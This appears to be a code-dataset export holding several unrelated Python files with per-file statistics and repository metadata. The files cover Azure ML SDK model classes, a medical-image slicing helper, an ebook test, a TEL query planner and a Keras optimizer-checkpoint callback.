:keyword uri: Required. Input Asset URI.
:paramtype uri: str
:keyword description: Description for the input.
:paramtype description: str
"""
super(MLTableJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
self.job_input_type = 'MLTable' # type: str
self.description = kwargs.get('description', None)
self.job_input_type = 'MLTable' # type: str
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:ivar created_by: The identity that created the resource.
:vartype created_by: str
:ivar created_by_type: The type of identity that created the resource. Possible values include:
"User", "Application", "ManagedIdentity", "Key".
:vartype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
:ivar created_at: The timestamp of resource creation (UTC).
:vartype created_at: ~datetime.datetime
:ivar last_modified_by: The identity that last modified the resource.
:vartype last_modified_by: str
:ivar last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:vartype last_modified_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
:ivar last_modified_at: The timestamp of resource last modification (UTC).
:vartype last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
"""
:keyword created_by: The identity that created the resource.
:paramtype created_by: str
:keyword created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:paramtype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
:keyword created_at: The timestamp of resource creation (UTC).
:paramtype created_at: ~datetime.datetime
:keyword last_modified_by: The identity that last modified the resource.
:paramtype last_modified_by: str
:keyword last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:paramtype last_modified_by_type: str or
~azure.mgmt.machinelearningservices.models.CreatedByType
:keyword last_modified_at: The timestamp of resource last modification (UTC).
:paramtype last_modified_at: ~datetime.datetime
"""
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class UriFileJobInput(JobInput, AssetJobInput):
"""UriFileJobInput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
'job_input_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
:keyword description: Description for the input.
:paramtype description: str
"""
super(UriFileJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
self.job_input_type = 'UriFile' # type: str
self.description = kwargs.get('description', None)
self.job_input_type = 'UriFile' # type: str
class UriFileJobOutput(JobOutputV2, AssetJobOutput):
"""UriFileJobOutput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:ivar uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:vartype uri: str
:ivar description: Description for the output.
:vartype description: str
:ivar job_output_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile".
:vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
"""
_validation = {
'job_output_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_output_type': {'key': 'jobOutputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
:keyword uri: Output Asset URI. This will have a default value of
"azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
:paramtype uri: str
:keyword description: Description for the output.
:paramtype description: str
"""
super(UriFileJobOutput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs.get('uri', None)
self.job_output_type = 'UriFile' # type: str
self.description = kwargs.get('description', None)
self.job_output_type = 'UriFile' # type: str
class UriFolderJobInput(JobInput, AssetJobInput):
"""UriFolderJobInput.
All required parameters must be populated in order to send to Azure.
:ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:ivar uri: Required. Input Asset URI.
:vartype uri: str
:ivar description: Description for the input.
:vartype description: str
:ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
values include: "UriFile", "UriFolder", "MLTable".
:vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
"""
_validation = {
'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
'job_input_type': {'required': True},
}
_attribute_map = {
'mode': {'key': 'mode', 'type': 'str'},
'uri': {'key': 'uri', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'job_input_type': {'key': 'jobInputType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
"""
:keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
"ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
:paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
:keyword uri: Required. Input Asset URI.
:paramtype uri: str
:keyword description: Description for the input.
:paramtype description: str
"""
super(UriFolderJobInput, self).__init__(**kwargs)
self.mode = kwargs.get('mode', None)
self.uri = kwargs['uri']
self.job_input_type = 'UriFolder' # type: str
self.description = kwargs.get('description', None)
self.job_input_type = 'UriFolder' # type: str
| 39.48853
| 146
| 0.650652
| 5,078
| 46,478
| 5.820008
| 0.081134
| 0.02487
| 0.058469
| 0.069432
| 0.696725
| 0.667355
| 0.636327
| 0.589734
| 0.54754
| 0.517392
| 0
| 0.001085
| 0.226279
| 46,478
| 1,176
| 147
| 39.522109
| 0.82075
| 0.539739
| 0
| 0.538947
| 0
| 0
| 0.250841
| 0.013673
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.004211
| 0
| 0.206316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3256f1d5ce64484739511b64bf4572f8dcbb09c
| 407
|
py
|
Python
|
utils.py
|
AbinavRavi/Federated-learning-MI
|
06294e5de94bf5b8826dedb469a3430fdae76e37
|
[
"MIT"
] | 3
|
2021-04-04T19:32:29.000Z
|
2022-02-10T05:25:27.000Z
|
utils.py
|
AbinavRavi/Federated-learning-MI
|
06294e5de94bf5b8826dedb469a3430fdae76e37
|
[
"MIT"
] | null | null | null |
utils.py
|
AbinavRavi/Federated-learning-MI
|
06294e5de94bf5b8826dedb469a3430fdae76e37
|
[
"MIT"
] | null | null | null |
import nibabel as nib
import numpy as np
from glob import glob
def to_slice(image_path,seg_path):
image = nib.load(image_path).get_fdata()
seg = nib.load(seg_path).get_fdata()
image_list = []
seg_list = []
for i in range(image.shape[2]):
if(np.nonzero(image[i])!= 0):
image_list.append(image[i])
seg_list.append(seg[i])
return image_list,seg_list
| 22.611111
| 44
| 0.638821
| 65
| 407
| 3.8
| 0.446154
| 0.109312
| 0.097166
| 0.129555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006431
| 0.235872
| 407
| 17
| 45
| 23.941176
| 0.787781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.230769
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3259ed1f24efeaecf755551060f140ed167c93c
| 576
|
py
|
Python
|
tests/test_ebook.py
|
plysytsya/doublebook
|
09dcd5399288c9544df928136a9e2f2e54639cbd
|
[
"MIT"
] | null | null | null |
tests/test_ebook.py
|
plysytsya/doublebook
|
09dcd5399288c9544df928136a9e2f2e54639cbd
|
[
"MIT"
] | null | null | null |
tests/test_ebook.py
|
plysytsya/doublebook
|
09dcd5399288c9544df928136a9e2f2e54639cbd
|
[
"MIT"
] | null | null | null |
import os
import unittest
from doublebook.ebook import Ebook
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class EbookTest(unittest.TestCase):
def setUp(self):
path_to_text = os.path.join(THIS_DIR, "test_data", "zen_en.txt")
self.ebook = Ebook(path_to_text)
def test_read(self):
self.ebook.read()
self.assertIsInstance(self.ebook.content, str)
def test_tokenize(self):
self.ebook.tokenize()
self.assertIsInstance(self.ebook.sentences, list)
if __name__ == '__main__':
unittest.main(verbosity=3)
| 22.153846
| 72
| 0.689236
| 77
| 576
| 4.87013
| 0.493506
| 0.12
| 0.053333
| 0.154667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002151
| 0.192708
| 576
| 25
| 73
| 23.04
| 0.804301
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.1875
| false
| 0
| 0.1875
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32ad9de709c3a24f830152b0d7a35e9a5113527
| 10,061
|
py
|
Python
|
src/panoramic/cli/husky/service/blending/tel_planner.py
|
kubamahnert/panoramic-cli
|
036f45a05d39f5762088ce23dbe367b938192f79
|
[
"MIT"
] | 5
|
2020-11-13T17:26:59.000Z
|
2021-03-19T15:11:26.000Z
|
src/panoramic/cli/husky/service/blending/tel_planner.py
|
kubamahnert/panoramic-cli
|
036f45a05d39f5762088ce23dbe367b938192f79
|
[
"MIT"
] | 5
|
2020-10-28T10:22:35.000Z
|
2021-01-27T17:33:58.000Z
|
src/panoramic/cli/husky/service/blending/tel_planner.py
|
kubamahnert/panoramic-cli
|
036f45a05d39f5762088ce23dbe367b938192f79
|
[
"MIT"
] | 3
|
2021-01-26T07:58:03.000Z
|
2021-03-11T13:28:34.000Z
|
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple, cast
from sqlalchemy import column
from panoramic.cli.husky.common.enum import EnumHelper
from panoramic.cli.husky.core.taxonomy.aggregations import AggregationDefinition
from panoramic.cli.husky.core.taxonomy.enums import AggregationType, TaxonTypeEnum
from panoramic.cli.husky.core.taxonomy.models import Taxon
from panoramic.cli.husky.core.taxonomy.override_mapping.types import (
OverrideMappingTelData,
)
from panoramic.cli.husky.core.tel.exceptions import TelExpressionException
from panoramic.cli.husky.core.tel.result import PostFormula, PreFormula, TaxonToTemplate
from panoramic.cli.husky.core.tel.sql_formula import SqlFormulaTemplate, SqlTemplate
from panoramic.cli.husky.core.tel.tel_dialect import TaxonTelDialect
from panoramic.cli.husky.service.context import HuskyQueryContext
from panoramic.cli.husky.service.filter_builder.filter_clauses import FilterClause
from panoramic.cli.husky.service.types.api_data_request_types import BlendingDataRequest
from panoramic.cli.husky.service.utils.exceptions import (
HuskyInvalidTelException,
InvalidRequest,
)
from panoramic.cli.husky.service.utils.taxon_slug_expression import (
TaxonExpressionStr,
TaxonMap,
)
class TelPlan:
data_source_formula_templates: Dict[str, List[SqlFormulaTemplate]]
comparison_data_source_formula_templates: Dict[str, List[SqlFormulaTemplate]]
dimension_formulas: List[PreFormula]
comparison_dimension_formulas: List[PreFormula]
metric_pre: List[PreFormula]
metric_post: List[Tuple[PostFormula, Taxon]]
"""
List of formulas SQL formulas and taxons for the last phase
"""
data_source_filter_templates: Dict[str, TaxonToTemplate]
comparison_join_columns: List[str]
"""
List of columns to join data and comparison dataframes
"""
comparison_raw_taxon_slugs: List[TaxonExpressionStr]
"""
List of raw taxon slugs to use for comparison
"""
override_mappings: OverrideMappingTelData
"""
List of override mappings referenced in the result
"""
comparison_override_mappings: OverrideMappingTelData
"""
List of override mappings referenced in the result of comparison query
"""
def __init__(self):
self.data_source_formula_templates = defaultdict(list)
self.comparison_data_source_formula_templates = defaultdict(list)
self.data_source_filter_templates = defaultdict(dict)
self.dimension_formulas = []
self.comparison_dimension_formulas = []
self.metric_pre = []
self.metric_post = []
self.comparison_join_columns = []
self.comparison_raw_taxon_slugs = []
self.override_mappings = set()
self.comparison_override_mappings = set()
class TelPlanner:
@classmethod
def plan(
cls,
ctx: HuskyQueryContext,
request: BlendingDataRequest,
projection_taxons: TaxonMap,
all_taxons: TaxonMap,
taxon_to_ds: Dict[str, Set[str]],
) -> TelPlan:
"""
Prepares taxons plan
"""
plan = TelPlan()
result_cache = dict()
all_data_sources = {subreq.properties.data_source for subreq in request.data_subrequests}
for taxon in projection_taxons.values():
if taxon.calculation:
original_slug = taxon.comparison_taxon_slug_origin or taxon.slug
taxon_data_sources = taxon_to_ds[original_slug]
result = cls._parse_taxon_expr(ctx, taxon, taxon.slug, taxon_data_sources, all_taxons)
result_cache[taxon.slug] = result
# Create dict for dim templates, key is data source
for ds_formula in result.data_source_formula_templates:
plan.data_source_formula_templates[ds_formula.data_source].append(ds_formula)
plan.dimension_formulas.extend(result.dimension_formulas)
plan.metric_pre.extend(result.pre_formulas)
plan.metric_post.append((result.post_formula, taxon))
plan.override_mappings.update(result.override_mappings)
else:
sql_slug = column(taxon.slug_safe_sql_identifier)
if taxon.is_dimension:
aggregation = taxon.aggregation or AggregationDefinition(type=AggregationType.group_by)
else:
aggregation = taxon.aggregation or AggregationDefinition(type=AggregationType.sum)
plan.metric_pre.append(PreFormula(sql_slug, taxon.slug, aggregation))
plan.metric_post.append((PostFormula(sql_slug), taxon))
if request.comparison and request.comparison.taxons:
for taxon in [all_taxons[slug] for slug in request.comparison.taxons]:
if taxon.calculation:
taxon_data_sources = all_data_sources
result = cls._parse_taxon_expr(
ctx, taxon, 'comp_join_col_' + taxon.slug, taxon_data_sources, all_taxons
)
# Create dict for dim templates, key is data source
for ds_formula in result.data_source_formula_templates:
plan.data_source_formula_templates[ds_formula.data_source].append(ds_formula)
if result.override_mappings:
plan.override_mappings.update(result.override_mappings)
plan.comparison_override_mappings.update(result.override_mappings)
plan.dimension_formulas.extend(result.dimension_formulas)
for ds_formula in result.data_source_formula_templates:
plan.comparison_data_source_formula_templates[ds_formula.data_source].append(ds_formula)
plan.comparison_dimension_formulas.extend(result.dimension_formulas)
for dim_formula in result.dimension_formulas:
plan.comparison_join_columns.append(dim_formula.label)
else:
# Raw comparison join taxon taxon.. add it to join and also to select from dataframes
plan.comparison_join_columns.append(taxon.slug_safe_sql_identifier)
plan.comparison_raw_taxon_slugs.append(taxon.slug_safe_sql_identifier)
cls._populate_filter_templates_to_plan(ctx, plan, request, all_taxons)
return plan
@classmethod
def _populate_filter_templates_to_plan(
cls, ctx: HuskyQueryContext, plan: TelPlan, request: BlendingDataRequest, all_taxons: TaxonMap
):
"""
Prepare sql templates for filters, keyed by data source and then by taxon slug.
In general, TelPlan filtering works like this:
1. create template for each subrequest filter taxon (raw and computed)
2. pass that template as dict to the single husky
3. In select builder, render these templates to create records into taxon_model_info_map,
especially the sql accessor property.
:param ctx:
"""
for subrequest in request.data_subrequests:
data_source = subrequest.properties.data_source
filter_templates = cls.get_preaggregation_filter_templates(
ctx,
[subrequest.preaggregation_filters, subrequest.scope.preaggregation_filters],
all_taxons,
data_source,
)
plan.data_source_filter_templates[data_source] = filter_templates
@classmethod
def get_preaggregation_filter_templates(
cls,
ctx: HuskyQueryContext,
filter_clauses: List[Optional[FilterClause]],
all_taxons: TaxonMap,
data_source: str,
) -> TaxonToTemplate:
"""
Creates sql templates for each taxon. Returns them keys by taxon slug.
"""
taxons_to_template: TaxonToTemplate = dict()
for filter_clause in filter_clauses:
if filter_clause:
taxon_slugs = filter_clause.get_taxon_slugs()
for slug in taxon_slugs:
taxon = all_taxons[cast(TaxonExpressionStr, slug)]
if not taxon.is_dimension:
exc = InvalidRequest(
'request.preaggregation_filters',
f'Metric taxons are not allowed in preaggregation filters. Remove filter for taxon {taxon.slug}',
)
raise exc
if taxon.calculation:
result = cls._parse_taxon_expr(
ctx, taxon, taxon.slug, [data_source], all_taxons, subrequest_only=True
)
taxons_to_template[taxon.slug_expr] = result.data_source_formula_templates[0]
else:
taxons_to_template[taxon.slug_expr] = SqlFormulaTemplate(
SqlTemplate(f'${{{taxon.slug}}}'), taxon.slug_expr, data_source, {taxon.slug_expr}
)
return taxons_to_template
@staticmethod
def _parse_taxon_expr(
ctx: HuskyQueryContext,
taxon: Taxon,
tel_prefix: str,
data_sources: Iterable[str],
all_taxons: TaxonMap,
subrequest_only=False,
):
taxon_type = EnumHelper.from_value(TaxonTypeEnum, taxon.taxon_type)
try:
return TaxonTelDialect().render(
expr=cast(str, taxon.calculation),
ctx=ctx,
taxon_map=all_taxons,
taxon_slug=tel_prefix,
comparison=taxon.is_comparison_taxon,
data_sources=data_sources,
taxon_type=taxon_type,
aggregation=taxon.aggregation,
subrequest_only=subrequest_only,
)
except TelExpressionException as error:
raise HuskyInvalidTelException(error, taxon.slug)
| 43.743478
| 125
| 0.657191
| 1,068
| 10,061
| 5.940075
| 0.185393
| 0.044136
| 0.035309
| 0.046343
| 0.337327
| 0.288304
| 0.220208
| 0.124527
| 0.107188
| 0.094578
| 0
| 0.00055
| 0.27701
| 10,061
| 229
| 126
| 43.934498
| 0.871597
| 0.066196
| 0
| 0.180233
| 0
| 0
| 0.01727
| 0.003364
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02907
| false
| 0
| 0.098837
| 0
| 0.22093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a32bb9ecf389628aa17fb222486d5eb8bc144dcb
| 13,836
|
py
|
Python
|
mrcnn/callbacks.py
|
dtitenko-dev/Mask_RCNN
|
5167db4174d96e9f2accc0a9f4866fb3a7bf5993
|
[
"MIT"
] | null | null | null |
mrcnn/callbacks.py
|
dtitenko-dev/Mask_RCNN
|
5167db4174d96e9f2accc0a9f4866fb3a7bf5993
|
[
"MIT"
] | null | null | null |
mrcnn/callbacks.py
|
dtitenko-dev/Mask_RCNN
|
5167db4174d96e9f2accc0a9f4866fb3a7bf5993
|
[
"MIT"
] | null | null | null |
import os
import re
import six
import h5py
import json
import logging
import tensorflow.keras as keras
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.saving import hdf5_format
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.keras.saving import saving_utils
from tensorflow.python.keras.utils.io_utils import path_to_string
from tensorflow.python.distribute import distributed_file_utils
from tensorflow.python.lib.io import file_io
from tensorflow.python.training import checkpoint_management
from tensorflow.python.util import serialization
def save_optimizer_weights(model, filepath, overwrite=True, **kwargs):
if not isinstance(filepath, h5py.File):
# If file exists and should not be overwritten.
if not overwrite and os.path.isfile(filepath):
proceed = hdf5_format.ask_to_proceed_with_overwrite(filepath)
if not proceed:
return
f = h5py.File(filepath, mode='w')
opened_new_file = True
else:
f = filepath
opened_new_file = False
try:
model_metadata = saving_utils.model_metadata(
model, include_optimizer=True, require_config=False)
for k, v in model_metadata.items():
if isinstance(v, (dict, list, tuple)):
f.attrs[k] = json.dumps(
v, default=serialization.get_json_type).encode('utf8')
else:
f.attrs[k] = v
if not isinstance(model.optimizer, optimizers.TFOptimizer):
hdf5_format.save_optimizer_weights_to_hdf5_group(f, model.optimizer)
f.flush()
finally:
if opened_new_file:
f.close()
def load_optimizer_weights(model, filepath):
"""Loads optimizer weights to compiled model from hdf5 file.
Arguments:
model: Compiled model
"""
opened_new_file = not isinstance(filepath, h5py.File)
if opened_new_file:
f = h5py.File(filepath, mode='r')
else:
f = filepath
try:
if model.optimizer and 'optimizer_weights' in f:
try:
model.optimizer._create_all_weights(model.trainable_variables)
except (NotImplementedError, AttributeError):
logging.warning(
'Error when creating the weights of optimizer {}, making it '
'impossible to restore the saved optimizer state. As a result, '
'your model is starting with a freshly initialized optimizer.')
optimizer_weight_values = hdf5_format.load_optimizer_weights_from_hdf5_group(f)
try:
model.optimizer.set_weights(optimizer_weight_values)
except ValueError:
logging.warning('Error in loading the saved optimizer '
'state. As a result, your model is '
'starting with a freshly initialized '
'optimizer.')
finally:
if opened_new_file:
f.close()
return model
class OptimizerCheckpoint(keras.callbacks.Callback):
def __init__(self,
filepath,
verbose=0,
save_freq='epoch',
**kwargs):
super(OptimizerCheckpoint, self).__init__()
self.verbose = verbose
self.filepath = path_to_string(filepath)
self.save_freq = save_freq
self.epochs_since_last_save = 0
self._batches_seen_since_last_saving = 0
self._last_batch_seen = 0
self._current_epoch = 0
if 'load_weights_on_restart' in kwargs:
self.load_weights_on_restart = kwargs['load_weights_on_restart']
logging.warning('`load_weights_on_restart` argument is deprecated. '
'Please use `model.load_weights()` for loading weights '
'before the start of `model.fit()`.')
else:
self.load_weights_on_restart = False
if 'period' in kwargs:
self.period = kwargs['period']
logging.warning('`period` argument is deprecated. Please use `save_freq` '
'to specify the frequency in number of batches seen.')
else:
self.period = 1
if self.save_freq != 'epoch' and not isinstance(self.save_freq, int):
raise ValueError('Unrecognized save_freq: {}'.format(self.save_freq))
# Only the chief worker writes model checkpoints, but all workers
# restore checkpoint at on_train_begin().
self._chief_worker_only = False
def on_train_begin(self, logs=None):
if self.load_weights_on_restart:
filepath_to_load = (
self._get_most_recently_modified_file_matching_pattern(self.filepath))
if (filepath_to_load is not None and
self._checkpoint_exists(filepath_to_load)):
try:
# `filepath` may contain placeholders such as `{epoch:02d}`, and
# thus it attempts to load the most recently modified file with file
# name matching the pattern.
load_optimizer_weights(self.model, filepath=filepath_to_load)
except (IOError, ValueError) as e:
raise ValueError('Error loading file from {}. Reason: {}'.format(
filepath_to_load, e))
def on_train_batch_end(self, batch, logs=None):
if self._should_save_on_batch(batch):
self._save_optimizer_weights(epoch=self._current_epoch, logs=logs)
def on_epoch_begin(self, epoch, logs=None):
self._current_epoch = epoch
def on_epoch_end(self, epoch, logs=None):
self.epochs_since_last_save += 1
if self.save_freq == 'epoch':
self._save_optimizer_weights(epoch, logs)
def _should_save_on_batch(self, batch):
"""Handles batch-level saving logic, supports steps_per_execution."""
if self.save_freq == 'epoch':
return False
if batch <= self._last_batch_seen: # New epoch.
add_batches = batch + 1 # batches are zero-indexed.
else:
add_batches = batch - self._last_batch_seen
self._batches_seen_since_last_saving += add_batches
self._last_batch_seen = batch
if self._batches_seen_since_last_saving >= self.save_freq:
self._batches_seen_since_last_saving = 0
return True
return False
def _save_optimizer_weights(self, epoch, logs=None):
"""Saves the optimizer weights.
Arguments:
epoch: the epoch this iteration is in.
logs: the `logs` dict passed in to `on_batch_end` or `on_epoch_end`.
"""
logs = logs or {}
if isinstance(self.save_freq, int) or self.epochs_since_last_save >= self.period:
# Block only when saving interval is reached.
logs = tf_utils.to_numpy_or_python_type(logs)
self.epochs_since_last_save = 0
filepath = self._get_file_path(epoch, logs)
try:
if self.verbose > 0:
print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath))
save_optimizer_weights(self.model, filepath, overwrite=True)
except IOError as e:
# `e.errno` appears to be `None` so checking the content of `e.args[0]`.
if 'is a directory' in six.ensure_str(e.args[0]).lower():
raise IOError('Please specify a non-directory filepath for '
'ModelCheckpoint. Filepath used is an existing '
'directory: {}'.format(filepath))
def _get_file_path(self, epoch, logs):
"""Returns the file path for checkpoint."""
# pylint: disable=protected-access
try:
# `filepath` may contain placeholders such as `{epoch:02d}` and
# `{mape:.2f}`. A mismatch between logged metrics and the path's
# placeholders can cause formatting to fail.
file_path = self.filepath.format(epoch=epoch + 1, **logs)
except KeyError as e:
raise KeyError('Failed to format this callback filepath: "{}". '
'Reason: {}'.format(self.filepath, e))
self._write_filepath = distributed_file_utils.write_filepath(
file_path, self.model.distribute_strategy)
return self._write_filepath
def _maybe_remove_file(self):
# Remove the checkpoint directory in multi-worker training where this worker
# should not checkpoint. It is a dummy directory previously saved for sync
# distributed training.
distributed_file_utils.remove_temp_dir_with_filepath(
self._write_filepath, self.model.distribute_strategy)
def _checkpoint_exists(self, filepath):
"""Returns whether the checkpoint `filepath` refers to exists."""
if filepath.endswith('.h5'):
return file_io.file_exists(filepath)
tf_saved_optimizer_exists = file_io.file_exists(filepath + '.h5')
return tf_saved_optimizer_exists
def _get_most_recently_modified_file_matching_pattern(self, pattern):
"""Returns the most recently modified filepath matching pattern.
Pattern may contain python formatting placeholder. If
`tf.train.latest_checkpoint()` does not return None, use that; otherwise,
check for most recently modified one that matches the pattern.
In the rare case where there are more than one pattern-matching file having
the same modified time that is most recent among all, return the filepath
that is largest (by `>` operator, lexicographically using the numeric
equivalents). This provides a tie-breaker when multiple files are most
recent. Note that a larger `filepath` can sometimes indicate a later time of
modification (for instance, when epoch/batch is used as formatting option),
but not necessarily (when accuracy or loss is used). The tie-breaker is
put in the logic as best effort to return the most recent, and to avoid
undeterministic result.
Modified time of a file is obtained with `os.path.getmtime()`.
This utility function is best demonstrated via an example:
```python
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
# Write something to each of the files
self.assertEqual(
_get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
```
Arguments:
pattern: The file pattern that may optionally contain python placeholder
such as `{epoch:02d}`.
Returns:
The most recently modified file's full filepath matching `pattern`. If
`pattern` does not contain any placeholder, this returns the filepath
that
exactly matches `pattern`. Returns `None` if no match is found.
"""
dir_name = os.path.dirname(pattern)
base_name = os.path.basename(pattern)
base_name_regex = '^' + re.sub(r'{.*}', r'.*', base_name) + '$'
# If tf.train.latest_checkpoint tells us there exists a latest checkpoint,
# use that as it is more robust than `os.path.getmtime()`.
latest_tf_checkpoint = checkpoint_management.latest_checkpoint(dir_name)
if latest_tf_checkpoint is not None and re.match(
base_name_regex, os.path.basename(latest_tf_checkpoint)):
return latest_tf_checkpoint
latest_mod_time = 0
file_path_with_latest_mod_time = None
n_file_with_latest_mod_time = 0
file_path_with_largest_file_name = None
if file_io.file_exists(dir_name):
for file_name in os.listdir(dir_name):
# Only consider if `file_name` matches the pattern.
if re.match(base_name_regex, file_name):
file_path = os.path.join(dir_name, file_name)
mod_time = os.path.getmtime(file_path)
if (file_path_with_largest_file_name is None or
file_path > file_path_with_largest_file_name):
file_path_with_largest_file_name = file_path
if mod_time > latest_mod_time:
latest_mod_time = mod_time
file_path_with_latest_mod_time = file_path
# In the case a file with later modified time is found, reset
# the counter for the number of files with latest modified time.
n_file_with_latest_mod_time = 1
elif mod_time == latest_mod_time:
# In the case a file has modified time tied with the most recent,
# increment the counter for the number of files with latest modified
# time by 1.
n_file_with_latest_mod_time += 1
if n_file_with_latest_mod_time == 1:
# Return the sole file that has most recent modified time.
return file_path_with_latest_mod_time
else:
# If there are more than one file having latest modified time, return
# the file path with the largest file name.
return file_path_with_largest_file_name
| 44.632258
| 92
| 0.626337
| 1,702
| 13,836
| 4.857814
| 0.202115
| 0.019352
| 0.017296
| 0.014393
| 0.269231
| 0.153362
| 0.09688
| 0.062893
| 0.044267
| 0.044267
| 0
| 0.006838
| 0.3024
| 13,836
| 309
| 93
| 44.776699
| 0.849772
| 0.265901
| 0
| 0.159794
| 0
| 0
| 0.095209
